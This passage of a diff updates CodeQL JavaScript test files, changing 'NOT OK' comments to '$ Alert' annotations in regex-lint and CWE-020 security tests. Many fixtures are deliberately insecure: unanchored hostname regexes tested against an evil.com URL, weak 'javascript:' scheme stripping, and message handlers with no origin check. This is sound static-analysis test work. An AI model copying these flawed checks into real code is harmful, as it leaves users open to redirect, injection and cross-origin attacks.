@@ /[\x0a\x0a]/; /[\u000a\n]/; /[\u{ff}]/; -/[\u{12340}-\u{12345}]/u; // OK -new RegExp("[\u{12340}-\u{12345}]", "u"); // OK +/[\u{12340}-\u{12345}]/u; +new RegExp("[\u{12340}-\u{12345}]", "u"); diff --git a/javascript/ql/test/query-tests/RegExp/IdentityReplacement/tst.js b/javascript/ql/test/query-tests/RegExp/IdentityReplacement/tst.js index 33325224dbbe..091c8049f193 100644 --- a/javascript/ql/test/query-tests/RegExp/IdentityReplacement/tst.js +++ b/javascript/ql/test/query-tests/RegExp/IdentityReplacement/tst.js @@ -1,16 +1,16 @@ -raw.replace("\\", "\\"); // NOT OK -raw.replace(/(\\)/, "\\"); // NOT OK -raw.replace(/["]/, "\""); // NOT OK -raw.replace("\\", "\\\\"); // OK +raw.replace("\\", "\\"); // $ Alert +raw.replace(/(\\)/, "\\"); // $ Alert +raw.replace(/["]/, "\""); // $ Alert +raw.replace("\\", "\\\\"); -raw.replace(/foo/g, 'foo'); // NOT OK -raw.replace(/foo/gi, 'foo'); // OK +raw.replace(/foo/g, 'foo'); // $ Alert +raw.replace(/foo/gi, 'foo'); -raw.replace(/^\\/, "\\"); // NOT OK -raw.replace(/\\$/, "\\"); // NOT OK -raw.replace(/\b\\/, "\\"); // NOT OK -raw.replace(/\B\\/, "\\"); // NOT OK -raw.replace(/\\(?!\\)/, "\\"); // NOT OK -raw.replace(/(?/g, "foo"); diff --git a/javascript/ql/test/query-tests/RegExp/RegExpAlwaysMatches/tst.js b/javascript/ql/test/query-tests/RegExp/RegExpAlwaysMatches/tst.js index b4c54be9b8a6..e46442da3432 100644 --- a/javascript/ql/test/query-tests/RegExp/RegExpAlwaysMatches/tst.js +++ b/javascript/ql/test/query-tests/RegExp/RegExpAlwaysMatches/tst.js @@ -1,37 +1,37 @@ function optionalPrefix(x) { - return /^(https:)?/.test(x); // NOT OK + return /^(https:)?/.test(x); // $ Alert } function mandatoryPrefix(x) { - return /^https:/.test(x); // OK + return /^https:/.test(x); } function httpOrHttps(x) { - return /^https?:/.test(x); // OK + return /^https?:/.test(x); } function optionalSuffix(x) { - return /(\.com)?$/.test(x); // NOT OK + return /(\.com)?$/.test(x); // $ Alert } function mandatorySuffix(x) { - return /\.com$/.test(x); // OK + return /\.com$/.test(x); } function protocol(x) { - return /^(?:https?:|ftp:|file:)?/.test(x); // NOT OK + return /^(?:https?:|ftp:|file:)?/.test(x); // $ Alert } function doubleAnchored(x) { - return /^(foo|bar)?$/.test(x); // OK + return /^(foo|bar)?$/.test(x); } function noAnchor(x) { - return /(foo|bar)?/.test(x); // NOT OK + return /(foo|bar)?/.test(x); // $ Alert } function altAnchor(x) { - return /^foo|bar$|(baz)?/.test(x); // NOT OK + return /^foo|bar$|(baz)?/.test(x); // $ Alert } function wildcard(x) { @@ -43,31 +43,31 @@ function wildcard2(x) { } function emptyAlt(x) { - return /^$|foo|bar/.test(x); // OK + return /^$|foo|bar/.test(x); } function emptyAlt2(x) { - return /(^$|foo|bar)/.test(x); // OK + return /(^$|foo|bar)/.test(x); } function emptyAlt3(x) { - return /((^$|foo|bar))/.test(x); // OK + return /((^$|foo|bar))/.test(x); } function search(x) { - return x.search(/[a-z]*/) > -1; // NOT OK + return x.search(/[a-z]*/) > -1; // $ Alert } function search2(x) { - return x.search(/[a-z]/) > -1; // OK + return x.search(/[a-z]/) > -1; } function lookahead(x) { - return x.search(/(?!x)/) > -1; // OK + return x.search(/(?!x)/) > -1; } function searchPrefix(x) { - return x.search(/^(foo)?/) > -1; // NOT OK - `foo?` does not affect the returned index + return x.search(/^(foo)?/) > -1; // $ Alert - `foo?` does not affect the returned index } function searchSuffix(x) { @@ -83,10 +83,10 @@ function nonWordBoundary(x) { } function emptyRegex(x) { - return new RegExp("").test(x); // OK + return new RegExp("").test(x); } function parserTest(x) { - /(\w\s*:\s*[^:}]+|#){|@import[^\n]+(?:url|,)/.test(x); // OK - /^((?:a{0,2}|-)|\w\{\d,\d\})+X$/.text(x); // ok + /(\w\s*:\s*[^:}]+|#){|@import[^\n]+(?:url|,)/.test(x); + /^((?:a{0,2}|-)|\w\{\d,\d\})+X$/.text(x); } diff --git a/javascript/ql/test/query-tests/RegExp/UnboundBackref/tst.js b/javascript/ql/test/query-tests/RegExp/UnboundBackref/tst.js index 9c5481469151..319eedf7e22c 100644 --- a/javascript/ql/test/query-tests/RegExp/UnboundBackref/tst.js +++ b/javascript/ql/test/query-tests/RegExp/UnboundBackref/tst.js @@ -1,16 +1,13 @@ -// OK + /\0/; -// NOT OK -/\1/; -// OK +/\1/; // $ Alert + /^(\s+)\w+\1$/; -// NOT OK -/^(?:\s+)\w+\1$/; -// OK +/^(?:\s+)\w+\1$/; // $ Alert + /[\1]/; -// OK + /^(?\s+)\w+\1$/; /^(?\s+)\w+\k$/; -// NOT OK -/^(?\s+)\w+\2$/; +/^(?\s+)\w+\2$/; // $ Alert /^(?\s+)\w+\k$/; diff --git a/javascript/ql/test/query-tests/RegExp/UnmatchableCaret/tst.js b/javascript/ql/test/query-tests/RegExp/UnmatchableCaret/tst.js index 50d70094dd64..b35bd4172385 100644 --- a/javascript/ql/test/query-tests/RegExp/UnmatchableCaret/tst.js +++ b/javascript/ql/test/query-tests/RegExp/UnmatchableCaret/tst.js @@ -1,32 +1,28 @@ -// NOT OK -/\[^(.css$)]/; +/\[^(.css$)]/; // $ Alert + -// OK /(a|^b)c/; -// OK + /a*(^b|c)/; -// NOT OK -/a\n^b/; +/a\n^b/; // $ Alert + -// OK /a\n^b/m; -// NOT OK, but not recognised -/a\\n^b/m; +/a\\n^b/m; // $ MISSING: Alert + +/ab*^c/; // $ Alert -// NOT OK -/ab*^c/; -// OK /^^abc/; -// OK + /^(^y|^z)(u$|v$)$/; -// OK + /x*^y/; -// OK + /(?<=(^|\/)(\.|\.\.))$/; diff --git a/javascript/ql/test/query-tests/RegExp/UnmatchableDollar/tst.js b/javascript/ql/test/query-tests/RegExp/UnmatchableDollar/tst.js index 95708b3cd0ed..86da692cea84 100644 --- a/javascript/ql/test/query-tests/RegExp/UnmatchableDollar/tst.js +++ b/javascript/ql/test/query-tests/RegExp/UnmatchableDollar/tst.js @@ -1,38 +1,33 @@ -// NOT OK -/\[^(.css$)]/; +/\[^(.css$)]/; // $ Alert + -// OK /a(b$|c)/; -// OK + /(a|b$)c*/; -// NOT OK -/a$\nb/; +/a$\nb/; // $ Alert + -// OK /a$\nb/m; -// NOT OK, but not recognised -/a$\\nb/m; +/a$\\nb/m; // $ MISSING: Alert + +/a$b*c/; // $ Alert -// NOT OK -/a$b*c/; -// OK /^(^y|^z)(u$|v$)$/; -// OK + /.*x$$$/; -// OK + /x$y*/; -// OK + /x(?!y+$).*y.*/; -// OK + /x(?=[yz]+$).*yz.*/; -// NOT OK -/(?<=$x)yz/; +/(?<=$x)yz/; // $ Alert diff --git a/javascript/ql/test/query-tests/Security/CWE-020/IncompleteHostnameRegExp/tst-IncompleteHostnameRegExp.js b/javascript/ql/test/query-tests/Security/CWE-020/IncompleteHostnameRegExp/tst-IncompleteHostnameRegExp.js index 320175ab1d42..ae0447f132fd 100644 --- a/javascript/ql/test/query-tests/Security/CWE-020/IncompleteHostnameRegExp/tst-IncompleteHostnameRegExp.js +++ b/javascript/ql/test/query-tests/Security/CWE-020/IncompleteHostnameRegExp/tst-IncompleteHostnameRegExp.js @@ -44,7 +44,7 @@ /^https:\/\/[a-z]*.example.com$/; // $ Alert RegExp('^protos?://(localhost|.+.example.net|.+.example-a.com|.+.example-b.com|.+.example.internal)'); // $ Alert - /^(example.dev|example.com)/; // OK + /^(example.dev|example.com)/; new RegExp('^http://localhost:8000|' + '^https?://.+.example\\.com/'); // $ Alert @@ -55,8 +55,8 @@ new RegExp('^http://test\.example.com'); // $ Alert - /^http:\/\/(..|...)\.example\.com\/index\.html/; // OK, wildcards are intentional - /^http:\/\/.\.example\.com\/index\.html/; // OK, the wildcard is intentional + /^http:\/\/(..|...)\.example\.com\/index\.html/; // OK - wildcards are intentional + /^http:\/\/.\.example\.com\/index\.html/; // OK - the wildcard is intentional /^(foo.example\.com|whatever)$/; // $ Alert (but kinda OK - one disjunction doesn't even look like a hostname) if (s.matchAll("^http://test.example.com")) {} // $ Alert diff --git a/javascript/ql/test/query-tests/Security/CWE-020/IncompleteUrlSchemeCheck/IncompleteUrlSchemeCheck.js b/javascript/ql/test/query-tests/Security/CWE-020/IncompleteUrlSchemeCheck/IncompleteUrlSchemeCheck.js index a4c6ed190f8f..964b9d23b0e9 100644 --- a/javascript/ql/test/query-tests/Security/CWE-020/IncompleteUrlSchemeCheck/IncompleteUrlSchemeCheck.js +++ b/javascript/ql/test/query-tests/Security/CWE-020/IncompleteUrlSchemeCheck/IncompleteUrlSchemeCheck.js @@ -41,7 +41,7 @@ function test5(url) { function test6(url) { let protocol = new URL(url).protocol; - if (badProtocolsGood.includes(protocol)) // OK + if (badProtocolsGood.includes(protocol)) return "about:blank"; return url; } @@ -113,7 +113,7 @@ function chain1(url) { } function chain2(url) { - return url // OK + return url .replace(/javascript:/, "") .replace(/data:/, "") .replace(/vbscript:/, ""); diff --git a/javascript/ql/test/query-tests/Security/CWE-020/IncompleteUrlSubstringSanitization/tst-IncompleteUrlSubstringSanitization.js b/javascript/ql/test/query-tests/Security/CWE-020/IncompleteUrlSubstringSanitization/tst-IncompleteUrlSubstringSanitization.js index f719a0835a6d..61d4006886bc 100644 --- a/javascript/ql/test/query-tests/Security/CWE-020/IncompleteUrlSubstringSanitization/tst-IncompleteUrlSubstringSanitization.js +++ b/javascript/ql/test/query-tests/Security/CWE-020/IncompleteUrlSubstringSanitization/tst-IncompleteUrlSubstringSanitization.js @@ -40,8 +40,8 @@ x.indexOf("index.php") !== -1; x.indexOf("index.css") !== -1; - x.indexOf("secure=true") !== -1; // OK (query param) - x.indexOf("&auth=") !== -1; // OK (query param) + x.indexOf("secure=true") !== -1; // OK - query param + x.indexOf("&auth=") !== -1; // OK - query param x.indexOf(getCurrentDomain()) !== -1; // $ MISSING: Alert x.indexOf(location.origin) !== -1; // $ MISSING: Alert diff --git a/javascript/ql/test/query-tests/Security/CWE-020/IncorrectSuffixCheck/tst.js b/javascript/ql/test/query-tests/Security/CWE-020/IncorrectSuffixCheck/tst.js index f50c014b1853..bd9ef71514b5 100644 --- a/javascript/ql/test/query-tests/Security/CWE-020/IncorrectSuffixCheck/tst.js +++ b/javascript/ql/test/query-tests/Security/CWE-020/IncorrectSuffixCheck/tst.js @@ -1,70 +1,70 @@ function endsWith(x, y) { - return x.indexOf(y) === x.length - y.length; // NOT OK + return x.indexOf(y) === x.length - y.length; // $ Alert } function endsWithGood(x, y) { - return x.length >= y.length && x.indexOf(y) === x.length - y.length; // OK + return x.length >= y.length && x.indexOf(y) === x.length - y.length; } function withStringConcat(x, y) { - return x.indexOf("/" + y) === x.length - y.length - 1; // NOT OK + return x.indexOf("/" + y) === x.length - y.length - 1; // $ Alert } function withStringConcatGood(x, y) { - return x.length > y.length && x.indexOf("/" + y) === x.length - y.length - 1; // OK + return x.length > y.length && x.indexOf("/" + y) === x.length - y.length - 1; } function withDelta(x, y) { let delta = x.length - y.length; - return x.indexOf(y) === delta; // NOT OK + return x.indexOf(y) === delta; // $ Alert } function withDeltaGood(x, y) { let delta = x.length - y.length; - return delta >= 0 && x.indexOf(y) === delta; // OK + return delta >= 0 && x.indexOf(y) === delta; } function literal(x) { - return x.indexOf("example.com") === x.length - "example.com".length; // NOT OK + return x.indexOf("example.com") === x.length - "example.com".length; // $ Alert } function literalGood(x) { return x.length >= "example.com".length && x.indexOf("example.com") === x.length - "example.com".length; } function intLiteral(x) { - return x.indexOf("example.com") === x.length - 11; // NOT OK + return x.indexOf("example.com") === x.length - 11; // $ Alert } function intLiteralGood(x) { return x.length >= 11 && x.indexOf("example.com") === x.length - 11; } function lastIndexOf(x, y) { - return x.lastIndexOf(y) === x.length - y.length; // NOT OK + return x.lastIndexOf(y) === x.length - y.length; // $ Alert } function lastIndexOfGood(x, y) { - return x.length >= y.length && x.lastIndexOf(y) === x.length - y.length; // OK + return x.length >= y.length && x.lastIndexOf(y) === x.length - y.length; } function withIndexOfCheckGood(x, y) { let index = x.indexOf(y); - return index !== -1 && index === x.length - y.length - 1; // OK + return index !== -1 && index === x.length - y.length - 1; } function indexOfCheckEquality(x, y) { - return x.indexOf(y) !== -1 && x.indexOf(y) === x.length - y.length - 1; // OK + return x.indexOf(y) !== -1 && x.indexOf(y) === x.length - y.length - 1; } function indexOfCheckEqualityBad(x, y) { - return x.indexOf(y) !== 0 && x.indexOf(y) === x.length - y.length - 1; // NOT OK + return x.indexOf(y) !== 0 && x.indexOf(y) === x.length - y.length - 1; // $ Alert } function indexOfCheckGood(x, y) { - return x.indexOf(y) >= 0 && x.indexOf(y) === x.length - y.length - 1; // OK + return x.indexOf(y) >= 0 && x.indexOf(y) === x.length - y.length - 1; } function indexOfCheckGoodSharp(x, y) { - return x.indexOf(y) > -1 && x.indexOf(y) === x.length - y.length - 1; // OK + return x.indexOf(y) > -1 && x.indexOf(y) === x.length - y.length - 1; } function indexOfCheckBad(x, y) { - return x.indexOf(y) >= -1 && x.indexOf(y) === x.length - y.length - 1; // NOT OK + return x.indexOf(y) >= -1 && x.indexOf(y) === x.length - y.length - 1; // $ Alert } function endsWithSlash(x) { @@ -73,39 +73,39 @@ function endsWithSlash(x) { function withIndexOfCheckBad(x, y) { let index = x.indexOf(y); - return index !== 0 && index === x.length - y.length - 1; // NOT OK + return index !== 0 && index === x.length - y.length - 1; // $ Alert } function plus(x, y) { - return x.indexOf("." + y) === x.length - (y.length + 1); // NOT OK + return x.indexOf("." + y) === x.length - (y.length + 1); // $ Alert } function withIndexOfCheckLower(x, y) { let index = x.indexOf(y); - return !(index < 0) && index === x.length - y.length - 1; // OK + return !(index < 0) && index === x.length - y.length - 1; } function withIndexOfCheckLowerEq(x, y) { let index = x.indexOf(y); - return !(index <= -1) && index === x.length - y.length - 1; // OK + return !(index <= -1) && index === x.length - y.length - 1; } function lastIndexNeqMinusOne(x) { - return x.lastIndexOf("example.com") !== -1 && x.lastIndexOf("example.com") === x.length - "example.com".length; // OK + return x.lastIndexOf("example.com") !== -1 && x.lastIndexOf("example.com") === x.length - "example.com".length; } function lastIndexEqMinusOne(x) { - return x.lastIndexOf("example.com") === -1 || x.lastIndexOf("example.com") === x.length - "example.com".length; // OK + return x.lastIndexOf("example.com") === -1 || x.lastIndexOf("example.com") === x.length - "example.com".length; } function sameCheck(allowedOrigin) { const trustedAuthority = "example.com"; const ind = trustedAuthority.indexOf("." + allowedOrigin); - return ind > 0 && ind === trustedAuthority.length - allowedOrigin.length - 1; // OK + return ind > 0 && ind === trustedAuthority.length - allowedOrigin.length - 1; } function sameConcatenation(allowedOrigin) { const trustedAuthority = "example.com"; - return trustedAuthority.indexOf("." + allowedOrigin) > 0 && trustedAuthority.indexOf("." + allowedOrigin) === trustedAuthority.length - allowedOrigin.length - 1; // OK + return trustedAuthority.indexOf("." + allowedOrigin) > 0 && trustedAuthority.indexOf("." + allowedOrigin) === trustedAuthority.length - allowedOrigin.length - 1; } \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-020/MissingOriginCheck/tst.js b/javascript/ql/test/query-tests/Security/CWE-020/MissingOriginCheck/tst.js index 6e5c0ce6a14a..8d6af30f773b 100644 --- a/javascript/ql/test/query-tests/Security/CWE-020/MissingOriginCheck/tst.js +++ b/javascript/ql/test/query-tests/Security/CWE-020/MissingOriginCheck/tst.js @@ -8,7 +8,7 @@ window.onmessage = event => { // OK - good origin check eval(event.data); } -window.onmessage = event => { // NOT OK - no origin check +window.onmessage = event => { // $ Alert - no origin check let origin = event.origin.toLowerCase(); console.log(origin); @@ -21,7 +21,7 @@ window.onmessage = event => { // OK - there is an origin check } } -self.onmessage = function(e) { // NOT OK +self.onmessage = function(e) { // $ Alert Commands[e.data.cmd].apply(null, e.data.args); }; @@ -37,7 +37,7 @@ window.onmessage = event => { // OK - there is an origin check } } -self.onmessage = function(e) { // NOT OK +self.onmessage = function(e) { // $ Alert Commands[e.data.cmd].apply(null, e.data.args); }; diff --git a/javascript/ql/test/query-tests/Security/CWE-020/MissingRegExpAnchor/tst-SemiAnchoredRegExp.js b/javascript/ql/test/query-tests/Security/CWE-020/MissingRegExpAnchor/tst-SemiAnchoredRegExp.js index 7a5618f88ec7..5267128a0f3c 100644 --- a/javascript/ql/test/query-tests/Security/CWE-020/MissingRegExpAnchor/tst-SemiAnchoredRegExp.js +++ b/javascript/ql/test/query-tests/Security/CWE-020/MissingRegExpAnchor/tst-SemiAnchoredRegExp.js @@ -1,76 +1,76 @@ (function coreRegExp() { /^a|/; - /^a|b/; // NOT OK + /^a|b/; // $ Alert /a|^b/; /^a|^b/; - /^a|b|c/; // NOT OK + /^a|b|c/; // $ Alert /a|^b|c/; /a|b|^c/; /^a|^b|c/; /(^a)|b/; - /^a|(b)/; // NOT OK + /^a|(b)/; // $ Alert /^a|(^b)/; - /^(a)|(b)/; // NOT OK + /^(a)|(b)/; // $ Alert - /a|b$/; // NOT OK + /a|b$/; // $ Alert /a$|b/; /a$|b$/; - /a|b|c$/; // NOT OK + /a|b|c$/; // $ Alert /a|b$|c/; /a$|b|c/; /a|b$|c$/; /a|(b$)/; - /(a)|b$/; // NOT OK + /(a)|b$/; // $ Alert /(a$)|b$/; - /(a)|(b)$/; // NOT OK + /(a)|(b)$/; // $ Alert - /^good.com|better.com/; // NOT OK - /^good\.com|better\.com/; // NOT OK - /^good\\.com|better\\.com/; // NOT OK - /^good\\\.com|better\\\.com/; // NOT OK - /^good\\\\.com|better\\\\.com/; // NOT OK + /^good.com|better.com/; // $ Alert + /^good\.com|better\.com/; // $ Alert + /^good\\.com|better\\.com/; // $ Alert + /^good\\\.com|better\\\.com/; // $ Alert + /^good\\\\.com|better\\\\.com/; // $ Alert - /^foo|bar|baz$/; // NOT OK - /^foo|%/; // OK + /^foo|bar|baz$/; // $ Alert + /^foo|%/; }); (function coreString() { new RegExp("^a|"); - new RegExp("^a|b"); // NOT OK + new RegExp("^a|b"); // $ Alert new RegExp("a|^b"); new RegExp("^a|^b"); - new RegExp("^a|b|c"); // NOT OK + new RegExp("^a|b|c"); // $ Alert new RegExp("a|^b|c"); new RegExp("a|b|^c"); new RegExp("^a|^b|c"); new RegExp("(^a)|b"); - new RegExp("^a|(b)"); // NOT OK + new RegExp("^a|(b)"); // $ Alert new RegExp("^a|(^b)"); - new RegExp("^(a)|(b)"); // NOT OK + new RegExp("^(a)|(b)"); // $ Alert - new RegExp("a|b$"); // NOT OK + new RegExp("a|b$"); // $ Alert new RegExp("a$|b"); new RegExp("a$|b$"); - new RegExp("a|b|c$"); // NOT OK + new RegExp("a|b|c$"); // $ Alert new RegExp("a|b$|c"); new RegExp("a$|b|c"); new RegExp("a|b$|c$"); new RegExp("a|(b$)"); - new RegExp("(a)|b$"); // NOT OK + new RegExp("(a)|b$"); // $ Alert new RegExp("(a$)|b$"); - new RegExp("(a)|(b)$"); // NOT OK + new RegExp("(a)|(b)$"); // $ Alert - new RegExp('^good.com|better.com'); // NOT OK - new RegExp('^good\.com|better\.com'); // NOT OK - new RegExp('^good\\.com|better\\.com'); // NOT OK - new RegExp('^good\\\.com|better\\\.com'); // NOT OK - new RegExp('^good\\\\.com|better\\\\.com'); // NOT OK + new RegExp('^good.com|better.com'); // $ Alert + new RegExp('^good\.com|better\.com'); // $ Alert + new RegExp('^good\\.com|better\\.com'); // $ Alert + new RegExp('^good\\\.com|better\\\.com'); // $ Alert + new RegExp('^good\\\\.com|better\\\\.com'); // $ Alert }); (function realWorld() { diff --git a/javascript/ql/test/query-tests/Security/CWE-020/MissingRegExpAnchor/tst-UnanchoredUrlRegExp.js b/javascript/ql/test/query-tests/Security/CWE-020/MissingRegExpAnchor/tst-UnanchoredUrlRegExp.js index c0c5ecb3e3e0..895707fae0fc 100644 --- a/javascript/ql/test/query-tests/Security/CWE-020/MissingRegExpAnchor/tst-UnanchoredUrlRegExp.js +++ b/javascript/ql/test/query-tests/Security/CWE-020/MissingRegExpAnchor/tst-UnanchoredUrlRegExp.js @@ -1,29 +1,29 @@ (function(x){ - if ("http://evil.com/?http://good.com".match("https?://good.com")) {} // NOT OK - if ("http://evil.com/?http://good.com".match(new RegExp("https?://good.com"))) {} // NOT OK - if ("http://evil.com/?http://good.com".match("^https?://good.com")) {} // NOT OK - missing post-anchor - if ("http://evil.com/?http://good.com".match(/^https?:\/\/good.com/)) {} // NOT OK - missing post-anchor - if ("http://evil.com/?http://good.com".match("(^https?://good1.com)|(^https?://good2.com)")) {} // NOT OK - missing post-anchor - if ("http://evil.com/?http://good.com".match("(https?://good.com)|(^https?://goodie.com)")) {} // NOT OK - missing post-anchor + if ("http://evil.com/?http://good.com".match("https?://good.com")) {} // $ Alert + if ("http://evil.com/?http://good.com".match(new RegExp("https?://good.com"))) {} // $ Alert + if ("http://evil.com/?http://good.com".match("^https?://good.com")) {} // $ Alert - missing post-anchor + if ("http://evil.com/?http://good.com".match(/^https?:\/\/good.com/)) {} // $ Alert - missing post-anchor + if ("http://evil.com/?http://good.com".match("(^https?://good1.com)|(^https?://good2.com)")) {} // $ Alert - missing post-anchor + if ("http://evil.com/?http://good.com".match("(https?://good.com)|(^https?://goodie.com)")) {} // $ Alert - missing post-anchor - /https?:\/\/good.com/.exec("http://evil.com/?http://good.com"); // NOT OK - new RegExp("https?://good.com").exec("http://evil.com/?http://good.com"); // NOT OK + /https?:\/\/good.com/.exec("http://evil.com/?http://good.com"); // $ Alert + new RegExp("https?://good.com").exec("http://evil.com/?http://good.com"); // $ Alert - if ("http://evil.com/?http://good.com".search("https?://good.com") > -1) {} // NOT OK + if ("http://evil.com/?http://good.com".search("https?://good.com") > -1) {} // $ Alert - new RegExp("https?://good.com").test("http://evil.com/?http://good.com"); // NOT OK + new RegExp("https?://good.com").test("http://evil.com/?http://good.com"); // $ Alert - if ("something".match("other")) {} // OK - if ("something".match("x.commissary")) {} // OK - if ("http://evil.com/?http://good.com".match("https?://good.com")) {} // NOT OK - if ("http://evil.com/?http://good.com".match("https?://good.com:8080")) {} // NOT OK + if ("something".match("other")) {} + if ("something".match("x.commissary")) {} + if ("http://evil.com/?http://good.com".match("https?://good.com")) {} // $ Alert + if ("http://evil.com/?http://good.com".match("https?://good.com:8080")) {} // $ Alert let trustedUrls = [ - "https?://good.com", // NOT OK, referenced below - /https?:\/\/good.com/, // NOT OK, referenced below - new RegExp("https?://good.com"), // NOT OK, referenced below - "^https?://good.com" // NOT OK - missing post-anchor + "https?://good.com", // $ Alert - referenced below + /https?:\/\/good.com/, // $ Alert - referenced below + new RegExp("https?://good.com"), // $ Alert - referenced below + "^https?://good.com" // $ Alert - missing post-anchor ]; function isTrustedUrl(url) { for (let trustedUrl of trustedUrls) { @@ -32,10 +32,10 @@ return false; } - /https?:\/\/good.com\/([0-9]+)/.exec(url); // NOT OK - "https://verygood.com/?id=" + /https?:\/\/good.com\/([0-9]+)/.exec(url)[0]; // OK - "http" + (secure? "s": "") + "://" + "verygood.com/?id=" + /https?:\/\/good.com\/([0-9]+)/.exec(url)[0]; // OK - "http" + (secure? "s": "") + "://" + ("verygood.com/?id=" + /https?:\/\/good.com\/([0-9]+)/.exec(url)[0]); // OK + /https?:\/\/good.com\/([0-9]+)/.exec(url); // $ Alert + "https://verygood.com/?id=" + /https?:\/\/good.com\/([0-9]+)/.exec(url)[0]; + "http" + (secure? "s": "") + "://" + "verygood.com/?id=" + /https?:\/\/good.com\/([0-9]+)/.exec(url)[0]; + "http" + (secure? "s": "") + "://" + ("verygood.com/?id=" + /https?:\/\/good.com\/([0-9]+)/.exec(url)[0]); // g or .replace? file = file.replace( @@ -46,7 +46,7 @@ // missing context of use const urlPatterns = [ { - regex: /youtube.com\/embed\/([a-z0-9\?&=\-_]+)/i, // OK + regex: /youtube.com\/embed\/([a-z0-9\?&=\-_]+)/i, type: 'iframe', w: 560, h: 314, url: '//www.youtube.com/embed/$1', allowFullscreen: true @@ -103,29 +103,29 @@ // replace path.replace(/engine.io/, "$&-client"); - /\.com|\.org/; // OK, has no domain name - /example\.com|whatever/; // OK, the other disjunction doesn't match a hostname + /\.com|\.org/; // OK - has no domain name + /example\.com|whatever/; // OK - the other disjunction doesn't match a hostname // MatchAll test cases: // Vulnerable patterns - if ("http://evil.com/?http://good.com".matchAll("https?://good.com")) {} // NOT OK - if ("http://evil.com/?http://good.com".matchAll(new RegExp("https?://good.com"))) {} // NOT OK - if ("http://evil.com/?http://good.com".matchAll("^https?://good.com")) {} // NOT OK - missing post-anchor - if ("http://evil.com/?http://good.com".matchAll(/^https?:\/\/good.com/g)) {} // NOT OK - missing post-anchor - if ("http://evil.com/?http://good.com".matchAll("(^https?://good1.com)|(^https?://good2.com)")) {} // NOT OK - missing post-anchor - if ("http://evil.com/?http://good.com".matchAll("(https?://good.com)|(^https?://goodie.com)")) {} // NOT OK - missing post-anchor - if ("http://evil.com/?http://good.com".matchAll("good.com")) {} // NOT OK - missing protocol - if ("http://evil.com/?http://good.com".matchAll("https?://good.com")) {} // NOT OK - if ("http://evil.com/?http://good.com".matchAll("https?://good.com:8080")) {} // NOT OK + if ("http://evil.com/?http://good.com".matchAll("https?://good.com")) {} // $ Alert + if ("http://evil.com/?http://good.com".matchAll(new RegExp("https?://good.com"))) {} // $ Alert + if ("http://evil.com/?http://good.com".matchAll("^https?://good.com")) {} // $ Alert - missing post-anchor + if ("http://evil.com/?http://good.com".matchAll(/^https?:\/\/good.com/g)) {} // $ Alert - missing post-anchor + if ("http://evil.com/?http://good.com".matchAll("(^https?://good1.com)|(^https?://good2.com)")) {} // $ Alert - missing post-anchor + if ("http://evil.com/?http://good.com".matchAll("(https?://good.com)|(^https?://goodie.com)")) {} // $ Alert - missing post-anchor + if ("http://evil.com/?http://good.com".matchAll("good.com")) {} // $ Alert - missing protocol + if ("http://evil.com/?http://good.com".matchAll("https?://good.com")) {} // $ Alert + if ("http://evil.com/?http://good.com".matchAll("https?://good.com:8080")) {} // $ Alert // Non-vulnerable patterns - if ("something".matchAll("other")) {} // OK - if ("something".matchAll("x.commissary")) {} // OK - if ("http://evil.com/?http://good.com".matchAll("^https?://good.com$")) {} // OK - if ("http://evil.com/?http://good.com".matchAll(new RegExp("^https?://good.com$"))) {} // OK - if ("http://evil.com/?http://good.com".matchAll("^https?://good.com/$")) {} // OK - if ("http://evil.com/?http://good.com".matchAll(/^https?:\/\/good.com\/$/)) {} // OK - if ("http://evil.com/?http://good.com".matchAll("(^https?://good1.com$)|(^https?://good2.com$)")) {} // OK - if ("http://evil.com/?http://good.com".matchAll("(https?://good.com$)|(^https?://goodie.com$)")) {} // OK + if ("something".matchAll("other")) {} + if ("something".matchAll("x.commissary")) {} + if ("http://evil.com/?http://good.com".matchAll("^https?://good.com$")) {} + if ("http://evil.com/?http://good.com".matchAll(new RegExp("^https?://good.com$"))) {} + if ("http://evil.com/?http://good.com".matchAll("^https?://good.com/$")) {} + if ("http://evil.com/?http://good.com".matchAll(/^https?:\/\/good.com\/$/)) {} + if ("http://evil.com/?http://good.com".matchAll("(^https?://good1.com$)|(^https?://good2.com$)")) {} + if ("http://evil.com/?http://good.com".matchAll("(https?://good.com$)|(^https?://goodie.com$)")) {} }); diff --git a/javascript/ql/test/query-tests/Security/CWE-020/SuspiciousRegexpRange/tst.js b/javascript/ql/test/query-tests/Security/CWE-020/SuspiciousRegexpRange/tst.js index 913922271bb3..ef4bd7e9ca7f 100644 --- a/javascript/ql/test/query-tests/Security/CWE-020/SuspiciousRegexpRange/tst.js +++ b/javascript/ql/test/query-tests/Security/CWE-020/SuspiciousRegexpRange/tst.js @@ -1,34 +1,34 @@ -var overlap1 = /^[0-93-5]$/; // NOT OK +var overlap1 = /^[0-93-5]$/; // $ Alert -var overlap2 = /[A-ZA-z]/; // NOT OK +var overlap2 = /[A-ZA-z]/; // $ Alert -var isEmpty = /^[z-a]$/; // NOT OK +var isEmpty = /^[z-a]$/; // $ Alert -var isAscii = /^[\x00-\x7F]*$/; // OK +var isAscii = /^[\x00-\x7F]*$/; var printable = /[!-~]/; // OK - used to select most printable ASCII characters -var codePoints = /[^\x21-\x7E]|[[\](){}<>/%]/g; // OK +var codePoints = /[^\x21-\x7E]|[[\](){}<>/%]/g; -const NON_ALPHANUMERIC_REGEXP = /([^\#-~| |!])/g; // OK +const NON_ALPHANUMERIC_REGEXP = /([^\#-~| |!])/g; -var smallOverlap = /[0-9a-fA-f]/; // NOT OK +var smallOverlap = /[0-9a-fA-f]/; // $ Alert -var weirdRange = /[$-`]/; // NOT OK +var weirdRange = /[$-`]/; // $ Alert -var keywordOperator = /[!\~\*\/%+-<>\^|=&]/; // NOT OK +var keywordOperator = /[!\~\*\/%+-<>\^|=&]/; // $ Alert -var notYoutube = /youtu\.be\/[a-z1-9.-_]+/; // NOT OK +var notYoutube = /youtu\.be\/[a-z1-9.-_]+/; // $ Alert -var numberToLetter = /[7-F]/; // NOT OK +var numberToLetter = /[7-F]/; // $ Alert -var overlapsWithClass1 = /[0-9\d]/; // NOT OK +var overlapsWithClass1 = /[0-9\d]/; // $ Alert -var overlapsWithClass2 = /[\w,.-?:*+]/; // NOT OK +var overlapsWithClass2 = /[\w,.-?:*+]/; // $ Alert -var tst2 = /^([ァ-ヾ]|[ァ-ン゙゚])+$/; // OK -var tst3 = /[0-90-9]/; // OK +var tst2 = /^([ァ-ヾ]|[ァ-ン゙゚])+$/; +var tst3 = /[0-90-9]/; -var question = /[0-?]/; // OK. matches one of: 0123456789:;<=>? +var question = /[0-?]/; // OK - matches one of: 0123456789:;<=>? -var 